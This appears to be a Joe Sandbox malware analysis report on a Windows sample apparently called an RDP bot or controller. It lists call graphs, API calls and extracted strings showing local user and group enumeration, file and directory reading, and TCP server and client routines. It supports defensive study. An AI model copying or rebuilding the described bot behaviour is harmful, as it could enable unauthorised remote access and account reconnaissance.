7ff8bfb57e48 61230->61232 61233 7ff8bfb57de7 61230->61233 61239 7ff8bfb531da 61231->61239 61234 7ff8bfb52fd2 6 API calls 61232->61234 61235 7ff8bfb57e78 61233->61235 61236 7ff8bfb57df0 61233->61236 61234->61239 61237 7ff8bfb52fd2 6 API calls 61235->61237 61252 
7ff8bfb57c92 8 API calls 61236->61252 61237->61239 61239->61127 61239->61131 61240 7ff8bfb57df5 61240->61239 61242 7ff8bfb52fe0 61241->61242 61253 7ff8bfb5d190 61242->61253 61252->61240 61254 7ff8bfb5d19e 61253->61254 61255 7ff8bfb5d1b5 61253->61255 61262 7ff8bfb58769 61261->61262 61263 7ff8bfb58731 61261->61263 61264 7ff8bfb52fd2 6 API calls 61262->61264 61269 7ff8bfb58409 61263->61269 61267 7ff8bfb58748 61264->61267 61267->61149 61267->61152 61270 7ff8bfb5843c 61269->61270 61271 7ff8bfb58421 61269->61271 61274 7ff8bfb52fd2 6 API calls 61270->61274 61272 7ff8bfb5846f 61271->61272 61273 7ff8bfb58426 61271->61273 61277 7ff8bfb52fd2 6 API calls 61272->61277 61275 7ff8bfb5842b 61273->61275 61276 7ff8bfb584a2 61273->61276 61280 7ff8bfb58465 61274->61280 61279 7ff8bfb5850c 61275->61279 61281 7ff8bfb584e1 strcmp 61275->61281 61278 7ff8bfb52fd2 6 API calls 61276->61278 61277->61280 61278->61280 61279->61280 61282 7ff8bfb58513 61279->61282 61283 7ff8bfb52fd2 6 API calls 61280->61283 61281->61275 61285 7ff8bfb58529 61283->61285 61285->61267 61304 7ff8bfb521ab 61303->61304 61305 7ff8bfb52182 LoadLibraryA 61303->61305 61306 7ff8bfb521ae GetLastError 61304->61306 61305->61306 61307 7ff8bfb52190 61305->61307 61308 7ff8bfb52fd2 6 API calls 61306->61308 61309 7ff8bfb52fd2 6 API calls 61307->61309 61347 7ff6be03ab1e 61346->61347 61348 7ff6be03ab35 61346->61348 61352 7ff6be03bb4b fputc 61347->61352 61353 7ff6be03bb4b fputc 61348->61353 61351 7ff6be039a49 61351->59395 61351->59396 61351->59397 61352->61351 61353->61351 61354 7ff8b915184a 61360 7ff8b9151855 61354->61360 61355 7ff8b915195e 61356 7ff8b915196b 61355->61356 61421 7ff8b91522d5 10 API calls 61355->61421 61358 7ff8b915187d Sleep 61358->61360 61360->61355 61360->61358 61362 7ff8b9151932 Sleep 61360->61362 61363 7ff8b91522d5 10 API calls 61360->61363 61365 7ff8b915191e memcpy 61360->61365 61366 7ff8b915256c socket 61360->61366 61401 7ff8b9152a1a 61360->61401 61412 7ff8b9151780 61360->61412 61362->61360 61363->61360 
61365->61360 61367 7ff8b915276b WSAGetLastError 61366->61367 61368 7ff8b91525a3 61366->61368 61371 7ff8b9151292 6 API calls 61367->61371 61369 7ff8b91525c5 61368->61369 61370 7ff8b91525a7 61368->61370 61374 7ff8b9152209 8 API calls 61369->61374 61422 7ff8b9152209 61370->61422 61373 7ff8b915278f 61371->61373 61376 7ff8b9152799 61373->61376 61377 7ff8b91525df 61373->61377 61378 7ff8b91525c3 61374->61378 61380 7ff8b9151292 6 API calls 61376->61380 61382 7ff8b9151292 6 API calls 61377->61382 61381 7ff8b91525d7 61378->61381 61435 7ff8b915233a setsockopt 61378->61435 61379 7ff8b915261e 61379->61381 61384 7ff8b9152623 htonl htons connect 61379->61384 61386 7ff8b9152600 61380->61386 61439 7ff8b91522d5 10 API calls 61381->61439 61382->61386 61388 7ff8b915267c WSAGetLastError 61384->61388 61389 7ff8b9152661 61384->61389 61386->61360 61391 7ff8b915268d 61388->61391 61392 7ff8b915273e WSAGetLastError 61388->61392 61390 7ff8b9152209 8 API calls 61389->61390 61394 7ff8b915266e 61390->61394 61391->61381 61395 7ff8b9152695 select 61391->61395 61393 7ff8b9151292 6 API calls 61392->61393 61393->61381 61394->61373 61394->61381 61396 7ff8b91526f6 61395->61396 61397 7ff8b9152720 61395->61397 61396->61389 61399 7ff8b91526fc WSAGetLastError 61396->61399 61398 7ff8b9151292 6 API calls 61397->61398 61398->61381 61400 7ff8b9151292 6 API calls 61399->61400 61400->61381 61402 7ff8b9152aa8 61401->61402 61403 7ff8b9152a34 61401->61403 61405 7ff8b9151292 6 API calls 61402->61405 61403->61402 61404 7ff8b9152a39 recv 61403->61404 61406 7ff8b9152a5c WSAGetLastError 61404->61406 61407 7ff8b9152a4f 61404->61407 61408 7ff8b9152a53 61405->61408 61406->61408 61409 7ff8b9152a70 61406->61409 61407->61408 61411 7ff8b9151292 6 API calls 61407->61411 61408->61360 61410 7ff8b9151292 6 API calls 61409->61410 61410->61408 61411->61408 61413 7ff8b9151798 61412->61413 61414 7ff8b9151842 61412->61414 61413->61414 61440 7ff8b915a000 61413->61440 61414->61360 61417 7ff8b9151834 LeaveCriticalSection 61417->61414 
61418 7ff8b91517c8 61418->61417 61419 7ff8b9151292 6 API calls 61418->61419 61443 7ff8b915e342 61418->61443 61419->61418 61421->61356 61423 7ff8b9152219 ioctlsocket 61422->61423 61425 7ff8b915223c 61423->61425 61426 7ff8b915224d WSAGetLastError 61423->61426 61425->61379 61428 7ff8b9152154 setsockopt 61425->61428 61427 7ff8b9151292 6 API calls 61426->61427 61427->61425 61429 7ff8b9152189 setsockopt 61428->61429 61430 7ff8b91521e4 WSAGetLastError 61428->61430 61431 7ff8b91521bf WSAGetLastError 61429->61431 61432 7ff8b91521b5 61429->61432 61433 7ff8b9151292 6 API calls 61430->61433 61434 7ff8b9151292 6 API calls 61431->61434 61432->61378 61433->61432 61434->61432 61436 7ff8b9152381 WSAGetLastError 61435->61436 61438 7ff8b9152377 61435->61438 61437 7ff8b9151292 6 API calls 61436->61437 61437->61438 61438->61379 61439->61377 61441 7ff8b91517ab EnterCriticalSection 61440->61441 61442 7ff8b915a016 GetSystemTimeAsFileTime 61440->61442 61441->61418 61442->61441 61444 7ff8b915e3bc 61443->61444 61445 7ff8b915e372 61443->61445 61444->61418 61446 7ff8b915e4c7 61445->61446 61447 7ff8b915e380 61445->61447 61495 7ff8b915dc30 70 API calls 61446->61495 61448 7ff8b915e434 61447->61448 61449 7ff8b915e386 61447->61449 61451 7ff8b915e47c 61448->61451 61452 7ff8b915e43b 61448->61452 61453 7ff8b915e4d5 61449->61453 61454 7ff8b915e391 61449->61454 61456 7ff8b915e4c0 61451->61456 61457 7ff8b915e483 61451->61457 61452->61444 61492 7ff8b915d86e 57 API calls 61452->61492 61497 7ff8b915e09c 56 API calls 61453->61497 61459 7ff8b915e3e6 61454->61459 61460 7ff8b915e393 61454->61460 61455 7ff8b915e40a 61455->61444 61494 7ff8b915d95d 52 API calls 61456->61494 61457->61444 61485 7ff8b915d2bb 61457->61485 61462 7ff8b915e4ce 61459->61462 61463 7ff8b915e3f1 61459->61463 61464 7ff8b915e3cb 61460->61464 61465 7ff8b915e39a 61460->61465 61496 7ff8b915de68 53 API calls 61462->61496 61468 7ff8b915e419 61463->61468 61469 7ff8b915e3f3 61463->61469 61464->61444 61489 7ff8b915e22c 16 API calls 61464->61489 61471 
7ff8b915e3a5 61465->61471 61472 7ff8b915e4e3 61465->61472 61468->61444 61491 7ff8b915df82 53 API calls 61468->61491 61477 7ff8b915e4dc 61469->61477 61478 7ff8b915e3fe 61469->61478 61473 7ff8b915e491 61471->61473 61474 7ff8b915e3b0 61471->61474 61499 7ff8b915e2bc 16 API calls 61472->61499 61493 7ff8b915d2c9 18 API calls 61473->61493 61474->61444 61488 7ff8b915d342 14 API calls 61474->61488 61498 7ff8b915e143 49 API calls 61477->61498 61478->61444 61482 7ff8b915e405 61478->61482 61490 7ff8b915da46 57 API calls 61482->61490 61500 7ff8b915d110 61485->61500 61488->61444 61489->61444 61490->61455 61491->61444 61492->61444 61493->61444 61494->61444 61495->61455 61496->61444 61497->61444 61498->61444 61499->61444 61527 7ff8b91591fb 61500->61527 61505 7ff8b915d167 61508 7ff8b915a000 GetSystemTimeAsFileTime 61505->61508 61506 7ff8b915d160 61533 7ff8b9155a68 17 API calls 61506->61533 61509 7ff8b915d17a 61508->61509 61510 7ff8b915d298 61509->61510 61513 7ff8b915d1a6 strlen 61509->61513 61535 7ff8b9155a68 17 API calls 61510->61535 61512 7ff8b915d29d 61515 7ff8b91591fb 2 API calls 61512->61515 61517 7ff8b915d13a 61512->61517 61514 7ff8b9151292 6 API calls 61513->61514 61516 7ff8b915d1de GetProcessHeap HeapAlloc 61514->61516 61515->61517 61518 7ff8b915d27d 61516->61518 61519 7ff8b915d200 61516->61519 61517->61444 61521 7ff8b9151292 6 API calls 61518->61521 61520 7ff8b915a000 GetSystemTimeAsFileTime 61519->61520 61522 7ff8b915d22f strcpy 61520->61522 61523 7ff8b915d293 61521->61523 61534 7ff8b9151992 13 API calls 61522->61534 61523->61510 61525 7ff8b915d258 61525->61509 61526 7ff8b915d261 GetProcessHeap HeapFree 61525->61526 61526->61509 61528 7ff8b9159206 61527->61528 61529 7ff8b9159211 QueryPerformanceFrequency QueryPerformanceCounter 61527->61529 61528->61517 61530 7ff8b9155a47 EnterCriticalSection 61528->61530 61529->61528 61536 7ff8b9154049 61530->61536 61533->61517 61534->61525 61535->61512 61537 7ff8b9154065 61536->61537 61540 7ff8b9154055 61536->61540 61542 7ff8b9152fbf 
61537->61542 61539 7ff8b915405f 61539->61505 61539->61506 61540->61539 61563 7ff8b915387f 61540->61563 61584 7ff8b9152edf 8 API calls 61542->61584 61544 7ff8b91535d6 61548 7ff8b9151292 6 API calls 61544->61548 61562 7ff8b91535df 61544->61562 61545 7ff8b91534d0 NetLocalGroupEnum 61546 7ff8b9152fd4 61545->61546 61546->61544 61546->61545 61549 7ff8b9153546 GetProcessHeap HeapAlloc 61546->61549 61551 7ff8b91534ad NetApiBufferFree 61546->61551 61547 7ff8b9153729 61552 7ff8b9151292 6 API calls 61547->61552 61548->61562 61553 7ff8b9153579 61549->61553 61554 7ff8b9152fe3 61549->61554 61551->61546 61556 7ff8b9153609 61552->61556 61557 7ff8b91535b4 61553->61557 61558 7ff8b9153585 memcpy GetProcessHeap HeapFree 61553->61558 61554->61546 61560 7ff8b9151292 6 API calls 61554->61560 61555 7ff8b91535ec 61559 7ff8b9151292 6 API calls 61555->61559 61556->61540 61557->61540 61558->61557 61559->61556 61560->61554 61561 7ff8b91535e7 61585 7ff8b9152edf 8 API calls 61561->61585 61562->61547 61562->61561 61564 7ff8b915379f 8 API calls 61563->61564 61569 7ff8b9153894 61564->61569 61565 7ff8b9153ed7 61568 7ff8b9151292 6 API calls 61565->61568 61583 7ff8b9153ee0 61565->61583 61566 7ff8b9153dba NetUserEnum 61566->61569 61567 7ff8b9154014 61570 7ff8b9151292 6 API calls 61567->61570 61568->61583 61569->61565 61569->61566 61571 7ff8b9153d97 NetApiBufferFree 61569->61571 61573 7ff8b9153e36 GetProcessHeap HeapAlloc 61569->61573 61574 7ff8b9153f0a 61570->61574 61571->61569 61572 7ff8b915379f 8 API calls 61575 7ff8b9153eed 61572->61575 61576 7ff8b9153e70 61573->61576 61577 7ff8b91538a3 61573->61577 61574->61539 61575->61574 61580 7ff8b9151292 6 API calls 61575->61580 61581 7ff8b9153e7c memcpy GetProcessHeap HeapFree 61576->61581 61582 7ff8b9153eb5 61576->61582 61577->61569 61578 7ff8b9151292 6 API calls 61577->61578 61578->61577 61579 7ff8b9153ee8 61579->61572 61580->61574 61581->61582 61582->61539 61583->61567 61583->61579 61584->61546 61585->61555 61586 7ff8bfb5364a 61592 7ff8bfb53655 

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
• Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
Similarity
• API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
• String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
• API String ID: 3624467404-104752423
• Opcode ID: 2c065d011c9ab7030f9672b503886fd27cb0c5ffb7622794d5e0c854782d74c2
• Instruction ID: f97704ef0d59d11db3e2192d24c36f60657465927338c1e70d9870f31ebe3acd
• Opcode Fuzzy Hash: 2c065d011c9ab7030f9672b503886fd27cb0c5ffb7622794d5e0c854782d74c2
• Instruction Fuzzy Hash: 26F15762A08A82C7EB608F1CE45437963A1EB85BD4F564036DB4E87398DF3DF846E741
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
                                                                                                                                                  • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                                                                                                  • API String ID: 1094913617-243243391
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                                                                                                                                  • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                                                                                                  • API String ID: 4253334766-243243391
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Free$Process$Local$AllocBufferEnumUsermemcpy
                                                                                                                                                  • String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
                                                                                                                                                  • API String ID: 1361071942-3382179125
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                                                                                                                                                  • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                                                                                                                                                  • API String ID: 3590747132-3524496754
                                                                                                                                                  APIs
                                                                                                                                                  • strcmp.MSVCRT ref: 00007FF6BE038C62
                                                                                                                                                  • strcmp.MSVCRT ref: 00007FF6BE038C75
                                                                                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF6BE038CB1
                                                                                                                                                  • _read.MSVCRT ref: 00007FF6BE038D07
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF6BE038D26
                                                                                                                                                    • Part of subcall function 00007FF6BE0388EE: FreeLibrary.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE03892F
                                                                                                                                                    • Part of subcall function 00007FF6BE0388EE: GetProcessHeap.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE038962
                                                                                                                                                    • Part of subcall function 00007FF6BE0388EE: HeapFree.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE038973
                                                                                                                                                    • Part of subcall function 00007FF6BE0389AA: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6BE038CE3,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8,00000000), ref: 00007FF6BE0389DB
                                                                                                                                                    • Part of subcall function 00007FF6BE0389AA: HeapFree.KERNEL32(?,?,00000000,00007FF6BE038CE3,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8,00000000), ref: 00007FF6BE0389EC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
                                                                                                                                                  • String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
                                                                                                                                                  • API String ID: 3617873859-308889057
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3714283218-0
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$fclosefflushfopenfseekfwrite
                                                                                                                                                  • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                                                                                                                  • API String ID: 2897271634-4162578512
                                                                                                                                                  • Opcode ID: 22b100c5830f6336c3720d7b497c3ec90ad88d6a61efeae168927c580a299fcb
                                                                                                                                                  • Instruction ID: a98f556bef790596188a3b22a663e00200f1627fc66f366a53f883346d779905
                                                                                                                                                  • Opcode Fuzzy Hash: 22b100c5830f6336c3720d7b497c3ec90ad88d6a61efeae168927c580a299fcb
                                                                                                                                                  • Instruction Fuzzy Hash: AAD14D61A09A4782FA209B5DE940BB82371BF78784F554133EB4ED72A5EE3CE566C301

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
                                                                                                                                                  • API String ID: 3214881788-719614687
                                                                                                                                                  • Opcode ID: e9a884daacb212d4b5132a2dbbe38604ce4ccd71cb5146d75cfab6842fa0af2b
                                                                                                                                                  • Instruction ID: 5c939acfee436a84d99edd7ecbbd509eb802bb114f707f60d5d1114badbe8287
                                                                                                                                                  • Opcode Fuzzy Hash: e9a884daacb212d4b5132a2dbbe38604ce4ccd71cb5146d75cfab6842fa0af2b
                                                                                                                                                  • Instruction Fuzzy Hash: 58F11424ACC74781FB249B8CE9947782352AF043E4F60033AD77E066E5DE6DB9899346

